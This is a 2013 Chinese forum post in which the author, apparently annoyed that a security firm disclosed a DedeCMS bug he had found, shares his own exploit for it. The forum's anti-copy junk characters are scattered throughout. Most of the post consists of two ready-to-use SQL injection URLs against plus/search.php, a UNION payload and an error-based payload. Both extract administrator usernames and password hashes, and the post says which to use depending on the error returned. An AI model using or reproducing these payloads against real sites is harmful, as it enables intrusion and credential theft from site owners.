转载不加作者名的没JJ/ ^6 M- \. t, K0 x
9 Y/ j; @0 F' ^
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
( o- Q! ^" ~/ o( j! }- I9 v% T6 i$ ]0 m% `, m* {
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
( G# ?& G9 a/ ?( C
3 L3 [- Z* j0 s. ^8 q我一般是这样测试的:8 A; ^5 u3 ^( s r' r1 v
' v+ H, |- r y: l
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a; R0 M2 V1 i4 u1 C& J
s9 o, M+ I0 K+ ?5 e转载不加作者名的没JJ
7 x/ D2 V8 N' a: K; j) y2 g8 w* _
作者:鬼哥& _& A- K! S: W' m
- \& y2 `! C$ N8 Q3 m# k
0 j) t3 e+ j( `1 G5 j0 q" j! U) o% C: D& |) J
看结果如果提示
- B% Y! G" l& H% _( q
9 A1 ^0 |' M- u1 j' y1 GSafe Alert: Request Error step 2 !
" ~6 T. H4 F7 [0 c" D9 m8 ]* S/ Y! U6 q) }" |. `; u' T
那么直接用下面的exp
& Z- c. |2 Y1 _3 T' H% _; m; V* y0 S0 C$ B# _ W
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
+ {- W) t9 Z8 r& Q' {1 t* ]6 \
9 b. y' u( x+ c3 k4 v+ j& T9 g7 V5 L, H* |% y$ Q4 `% H. A
看结果如果提示
$ ~. N% _# Z5 X4 X6 K- G! ] y; u, b+ n! ]
Safe Alert: Request Error step 1 !
) `2 B' _$ H5 e# j
`3 t! e2 q9 {& a# X% Z/ t) T+ E那么直接用下面的exp
. V1 F( [" B( d/ i
" o- u* B; w, H: H( t6 Z( z' Fxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
3 F& z5 p+ q3 R; `, j
; z3 B0 a# G6 u+ I* ^8 C: {6 b+ C3 J& J5 E( R
如果正常显示证明漏洞不存在了。1 A+ X9 T4 T0 Z+ n
0 k: ~6 v, R" r4 e8 S# `3 o
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对